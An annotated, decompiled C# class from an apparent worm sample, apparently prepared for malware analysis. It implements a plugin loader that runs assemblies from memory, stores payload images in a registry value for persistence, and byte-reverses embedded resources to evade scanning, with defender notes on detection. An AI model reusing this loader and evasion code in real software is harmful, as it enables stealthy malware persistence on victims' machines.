// Decompiled with JetBrains decompiler
// Type: Ҧ߲๒ʽ໙ୄᴘ.ᙐᗡѬᵲ૦ᵛଔѥቾ
// Assembly: dns-sd, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 4A42D535-5A92-4CC4-9677-40E6ACE36033
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Worm.Win32.Shakblades.ajg-02a9138068421a7a0b8924d80ebf6e55a41d8132d9fc1210df874ab33801b79f.exe
//
// Analyst note: every identifier in this listing was renamed by an obfuscator, so the
// comments below describe only what the visible calls do. The configuration class, the
// byte/string transform helper class and the Plugin namespace (IPlugin, PluginArgs) are
// referenced here but defined elsewhere in the assembly.

using Microsoft.Win32;
using Plugin;
using System;
using System.Collections.Generic;
using System.IO;
using System.Reflection;
using System.Resources;
using System.Runtime.Serialization.Formatters.Binary;
using System.Threading;

namespace Ҧ߲๒ʽ໙ୄᴘ
{
  /// <summary>
  /// Static plugin manager. It loads plugin assemblies from in-memory byte arrays with
  /// <c>Assembly.Load</c>, tracks them in two lists keyed by plugin Guid, and can store the
  /// raw assembly bytes in a registry value and reload them from there.
  /// </summary>
  public class ᙐᗡѬᵲ૦ᵛଔѥቾ
  {
    // Plugin Guid -> raw assembly bytes (byte[]). This is the list that gets serialized
    // into the registry value and restored from it.
    public static SortedList \u0382Ⴊ\u19CD\u0DF1в = new SortedList();
    // Plugin Guid -> live IPlugin instance.
    public static SortedList රᓙ = new SortedList();
    // Last status text: cleared on a successful load or registration, otherwise set to a
    // decoded message or an exception message. Returned by the parameterless getter below.
    private static string \u1AA8ᓅȻٻ\u0DCE\u02F8\u193Cᰮ = string.Empty;

    // Event of the delegate type declared at the bottom of the class.
    // NOTE(review): the methods below invoke a differently named member that is not
    // declared in this listing; presumably it is the compiler-generated backing delegate
    // of this event after obfuscation. Confirm against the IL.
    public static event ᙐᗡѬᵲ૦ᵛଔѥቾ.ᘕঃ \u0C11\u0FBFᵥރតൃĚŹᗐ;

    /// <summary>
    /// Serializes the Guid -> assembly-bytes list with BinaryFormatter, passes the result
    /// through a helper transform (not shown) and writes it as one registry value.
    /// </summary>
    /// <remarks>
    /// Defender note: this class writes no plugin file to disk; the plugin assemblies are
    /// kept in a single binary registry value. Hive, key path and value name all come from
    /// the configuration class, so they cannot be read off this listing.
    /// </remarks>
    public static void ᇎ()
    {
      try
      {
        BinaryFormatter binaryFormatter = new BinaryFormatter();
        MemoryStream serializationStream = new MemoryStream();
        binaryFormatter.Serialize((Stream) serializationStream, (object) ᙐᗡѬᵲ૦ᵛଔѥቾ.\u0382Ⴊ\u19CD\u0DF1в);
        serializationStream.Close();
        // Helper transform applied before storing; what it does (encoding, compression,
        // encryption) is not visible here.
        byte[] numArray = \u1928ᔾዔ.ᅀძṶၠ(serializationStream.ToArray(), false);
        // The hive is chosen by configuration: HKCU when it equals CurrentUser, else HKLM.
        if (ȩזြڹᡡỾỔው.Փᬃᜐᣖ̗ᨠᵴ == RegistryHive.CurrentUser)
          Registry.CurrentUser.CreateSubKey(ȩזြڹᡡỾỔው.\u187Dठ\u1371aːࠍؒ\u0A7Dᇁ).SetValue(ȩזြڹᡡỾỔው.ᠧᏄࣧެΙά\u066A, (object) numArray);
        else
          Registry.LocalMachine.CreateSubKey(ȩזြڹᡡỾỔው.\u187Dठ\u1371aːࠍؒ\u0A7Dᇁ).SetValue(ȩזြڹᡡỾỔው.ᠧᏄࣧެΙά\u066A, (object) numArray);
      }
      catch
      {
        // Every failure (serialization, registry access) is silently discarded.
      }
    }

    /// <summary>
    /// On a new thread: reads the stored registry value, passes it through a second helper
    /// transform, deserializes it back into the Guid -> assembly-bytes list and loads every
    /// stored assembly.
    /// </summary>
    /// <remarks>
    /// Defender note: the read path also uses CreateSubKey, which creates the key when it
    /// does not exist, so the key can be present on a host even when the value was never
    /// written.
    /// </remarks>
    public static void ʉᆖͧ\u05CB\u00A9ᤤդܛ() => new Thread((ThreadStart) (() =>
    {
      try
      {
        BinaryFormatter binaryFormatter = new BinaryFormatter();
        // These two locals are only ever assigned null below (decompiler residue).
        MemoryStream memoryStream;
        byte[] numArray1;
        if (ȩזြڹᡡỾỔው.Փᬃᜐᣖ̗ᨠᵴ == RegistryHive.CurrentUser)
        {
          // Presumably the inverse of the transform used when storing; helper not shown.
          MemoryStream serializationStream = new MemoryStream(\u1928ᔾዔ.ᖝሇᬐ\u09D1য়᪷(Registry.CurrentUser.CreateSubKey(ȩזြڹᡡỾỔው.\u187Dठ\u1371aːࠍؒ\u0A7Dᇁ).GetValue(ȩזြڹᡡỾỔው.ᠧᏄࣧެΙά\u066A) as byte[], false));
          // The in-memory list is replaced by whatever the registry value deserializes to.
          ᙐᗡѬᵲ૦ᵛଔѥቾ.\u0382Ⴊ\u19CD\u0DF1в = binaryFormatter.Deserialize((Stream) serializationStream) as SortedList;
          serializationStream.Close();
          serializationStream.Dispose();
          memoryStream = (MemoryStream) null;
          numArray1 = (byte[]) null;
        }
        else
        {
          // Same sequence against HKLM.
          MemoryStream serializationStream = new MemoryStream(\u1928ᔾዔ.ᖝሇᬐ\u09D1য়᪷(Registry.LocalMachine.CreateSubKey(ȩזြڹᡡỾỔው.\u187Dठ\u1371aːࠍؒ\u0A7Dᇁ).GetValue(ȩזြڹᡡỾỔው.ᠧᏄࣧެΙά\u066A) as byte[], false));
          ᙐᗡѬᵲ૦ᵛଔѥቾ.\u0382Ⴊ\u19CD\u0DF1в = binaryFormatter.Deserialize((Stream) serializationStream) as SortedList;
          serializationStream.Close();
          serializationStream.Dispose();
          memoryStream = (MemoryStream) null;
          numArray1 = (byte[]) null;
        }
        // Each stored value is a raw assembly image handed to the in-memory loader.
        foreach (byte[] numArray2 in (IEnumerable) ᙐᗡѬᵲ૦ᵛଔѥቾ.\u0382Ⴊ\u19CD\u0DF1в.Values)
          ᙐᗡѬᵲ૦ᵛଔѥቾ.ͷᵐ݁ȁऴᡕ\u0EF1ቺ\u002F(numArray2);
      }
      catch
      {
        // Missing value, failed transform or failed deserialization: silently ignored.
      }
    })).Start();

    /// <summary>
    /// On a new thread: loads plugins embedded in this assembly's resource set "p". The
    /// entry "Len" holds the count and the entries "0".."Len-1" hold the images, each stored
    /// byte-reversed. If the configuration flag is set, the loaded set is then written to
    /// the registry.
    /// </summary>
    /// <remarks>
    /// Defender note: because the embedded images are reversed, a static scan of the
    /// resources will not see an executable header at the start of an entry; reverse each
    /// entry before signature matching.
    /// </remarks>
    public static void dz() => new Thread((ThreadStart) (() =>
    {
      try
      {
        // Nothing to do when the assembly carries no manifest resources.
        if (Assembly.GetExecutingAssembly().GetManifestResourceNames().Length == 0)
          return;
        ResourceManager resourceManager = new ResourceManager("p", Assembly.GetExecutingAssembly());
        int num = (int) resourceManager.GetObject("Len");
        for (int index = 0; index < num; ++index)
        {
          byte[] numArray = (byte[]) resourceManager.GetObject(index.ToString());
          // Undo the byte reversal in place before handing the image to the loader.
          Array.Reverse((Array) numArray);
          ᙐᗡѬᵲ૦ᵛଔѥቾ.ͷᵐ݁ȁऴᡕ\u0EF1ቺ\u002F(numArray);
        }
        // The same configuration flag also gates the registry delete method further down.
        if (!ȩזြڹᡡỾỔው.ጅũކᠾߠጇᔰᏫ)
          return;
        ᙐᗡѬᵲ૦ᵛଔѥቾ.ᇎ();
      }
      catch (Exception ex)
      {
        Console.WriteLine(ex.Message);
      }
    })).Start();

    /// <summary>
    /// Loads an assembly from a byte array and registers the first type in it that passes
    /// the IPlugin check.
    /// </summary>
    /// <param name="_param0">Raw assembly image passed to <c>Assembly.Load</c>.</param>
    /// <returns>
    /// true when a plugin type was found and was not already present in both lists; false
    /// when it was present in both, when no type matched, or when an exception was thrown.
    /// The status string is set accordingly.
    /// </returns>
    /// <remarks>
    /// Defender note: the plugin code is loaded from memory only (Assembly.Load(byte[])),
    /// so there is no module path on disk to pivot on.
    /// </remarks>
    public static bool ͷᵐ݁ȁऴᡕ\u0EF1ቺ\u002F(byte[] _param0)
    {
      try
      {
        foreach (Type type in Assembly.Load(_param0).GetTypes())
        {
          // Counts in how many of the two lists this plugin's Guid already exists.
          int num = 0;
          if (type.IsClass && type.IsSubclassOf(typeof (IPlugin)))
          {
            IPlugin instance = (IPlugin) Activator.CreateInstance(type);
            // Auto-run plugins are initialized and executed on their own thread before the
            // duplicate check below, so a duplicate still runs.
            if (instance.ExecuteOnLoad)
            {
              instance.Initialize();
              ᙐᗡѬᵲ૦ᵛଔѥቾ.ᄄĐἮᥪ᭫ᘙȃই((object) null, instance, instance.ExecuteOnLoadArgs);
            }
            if (!ᙐᗡѬᵲ૦ᵛଔѥቾ.\u0382Ⴊ\u19CD\u0DF1в.ContainsKey(instance.Guid))
              ᙐᗡѬᵲ૦ᵛଔѥቾ.\u0382Ⴊ\u19CD\u0DF1в.Add(instance.Guid, _param0);
            else
              ++num;
            if (!ᙐᗡѬᵲ૦ᵛଔѥቾ.රᓙ.ContainsKey(instance.Guid))
              ᙐᗡѬᵲ૦ᵛଔѥቾ.රᓙ.Add(instance.Guid, instance);
            else
              ++num;
            ᙐᗡѬᵲ૦ᵛଔѥቾ.\u1AA8ᓅȻٻ\u0DCE\u02F8\u193Cᰮ = string.Empty;
            if (num == 2)
            {
              // Already present in both lists: status = plugin name + a string decoded at
              // run time by a helper that is not shown (plaintext not recoverable here).
              ᙐᗡѬᵲ૦ᵛଔѥቾ.\u1AA8ᓅȻٻ\u0DCE\u02F8\u193Cᰮ = instance.Name + \u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ("bVN0n6WYlJcznRO9rFOGp6KlmJc=", true);
              return false;
            }
            // Notify subscribers that a plugin was loaded (see the note on the event).
            if (ᙐᗡѬᵲ૦ᵛଔѥቾ.ޅ\u0ADCğඐႳᚦ\u086Fn\u09FA != null)
              ᙐᗡѬᵲ૦ᵛଔѥቾ.ޅ\u0ADCğඐႳᚦ\u086Fn\u09FA((object) null, instance);
            // Returns on the first matching type; later types in the assembly are ignored.
            return true;
          }
        }
        // No type passed the check: status is set to another run-time-decoded string.
        ᙐᗡѬᵲ૦ᵛଔѥቾ.\u1AA8ᓅȻٻ\u0DCE\u02F8\u193Cᰮ = \u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ("dp+UpqZTqpynm1N8g5+ompyhUzOdE72coaeYpZmUlphToaKnU5miqKGXYQ==", true);
      }
      catch (Exception ex)
      {
        Console.WriteLine(ex.Message);
        ᙐᗡѬᵲ૦ᵛଔѥቾ.\u1AA8ᓅȻٻ\u0DCE\u02F8\u193Cᰮ = ex.Message;
      }
      return false;
    }

    /// <summary>
    /// Registers an already constructed plugin instance. Only the instance list is updated;
    /// no assembly bytes are recorded, so such a plugin is not included in the data written
    /// to the registry.
    /// </summary>
    /// <param name="_param0">Plugin instance to register.</param>
    /// <returns>true when the Guid was new; false (and a status string) when it was already registered.</returns>
    public static bool ᓒኞᣆќᆈࡏಒ\u0B76ୁ(IPlugin _param0)
    {
      if (!ᙐᗡѬᵲ૦ᵛଔѥቾ.රᓙ.ContainsKey(_param0.Guid))
      {
        ᙐᗡѬᵲ૦ᵛଔѥቾ.රᓙ.Add(_param0.Guid, _param0);
        ᙐᗡѬᵲ૦ᵛଔѥቾ.\u1AA8ᓅȻٻ\u0DCE\u02F8\u193Cᰮ = string.Empty;
        if (ᙐᗡѬᵲ૦ᵛଔѥቾ.ޅ\u0ADCğඐႳᚦ\u086Fn\u09FA != null)
          ᙐᗡѬᵲ૦ᵛଔѥቾ.ޅ\u0ADCğඐႳᚦ\u086Fn\u09FA((object) null, _param0);
        return true;
      }
      // Same encoded suffix as the duplicate branch of the byte-array loader.
      ᙐᗡѬᵲ૦ᵛଔѥቾ.\u1AA8ᓅȻٻ\u0DCE\u02F8\u193Cᰮ = _param0.Name + \u1928ᔾዔ.ᶽ\u005B\u0E8EЇᘹഏಔভ("bVN0n6WYlJcznRO9rFOGp6KlmJc=", true);
      return false;
    }

    /// <summary>
    /// Removes a plugin from both in-memory lists. The registry value is not rewritten here
    /// and the loaded assembly is not unloaded.
    /// </summary>
    /// <param name="_param0">Guid of the plugin to remove.</param>
    public static void \u136Eᐰ\u1CAA\u0EE1ள(Guid _param0)
    {
      if (!ᙐᗡѬᵲ૦ᵛଔѥቾ.රᓙ.ContainsKey(_param0))
        return;
      ᙐᗡѬᵲ૦ᵛଔѥቾ.\u0382Ⴊ\u19CD\u0DF1в.Remove(_param0);
      ᙐᗡѬᵲ૦ᵛଔѥቾ.රᓙ.Remove(_param0);
    }

    /// <summary>Returns the last status string (empty after a successful load or registration).</summary>
    public static string \u0CC0() => ᙐᗡѬᵲ૦ᵛଔѥቾ.\u1AA8ᓅȻٻ\u0DCE\u02F8\u193Cᰮ;

    /// <summary>
    /// Runs a plugin's Execute method on a new thread; an exception is written to the
    /// console and goes no further.
    /// </summary>
    /// <param name="ඳ">Sender object forwarded to the plugin.</param>
    /// <param name="_param1">Plugin to execute.</param>
    /// <param name="_param2">Arguments forwarded to the plugin.</param>
    public static void ᄄĐἮᥪ᭫ᘙȃই(object ඳ, IPlugin _param1, PluginArgs _param2) => new Thread((ThreadStart) (() =>
    {
      try
      {
        _param1.Execute(ඳ, _param2);
      }
      catch (Exception ex)
      {
        Console.WriteLine(ex.Message);
      }
    })).Start();

    /// <summary>
    /// Deletes the stored registry value from the configured hive, but only when the
    /// configuration flag that gates the registry write after the resource load is set.
    /// Only the value is deleted; the key that CreateSubKey opened or created remains.
    /// </summary>
    public static void ፂ\u0ECFȐفᅵټ༵୩()
    {
      try
      {
        if (!ȩזြڹᡡỾỔው.ጅũކᠾߠጇᔰᏫ)
          return;
        if (ȩזြڹᡡỾỔው.Փᬃᜐᣖ̗ᨠᵴ == RegistryHive.CurrentUser)
          Registry.CurrentUser.CreateSubKey(ȩזြڹᡡỾỔው.\u187Dठ\u1371aːࠍؒ\u0A7Dᇁ).DeleteValue(ȩזြڹᡡỾỔው.ᠧᏄࣧެΙά\u066A);
        else
          Registry.LocalMachine.CreateSubKey(ȩזြڹᡡỾỔው.\u187Dठ\u1371aːࠍؒ\u0A7Dᇁ).DeleteValue(ȩזြڹᡡỾỔው.ᠧᏄࣧެΙά\u066A);
      }
      catch
      {
        // A missing value or denied access is silently ignored.
      }
    }

    // Handler signature for the plugin-loaded event declared near the top of the class.
    public delegate void ᘕঃ(object sender, IPlugin plugin);
  }
}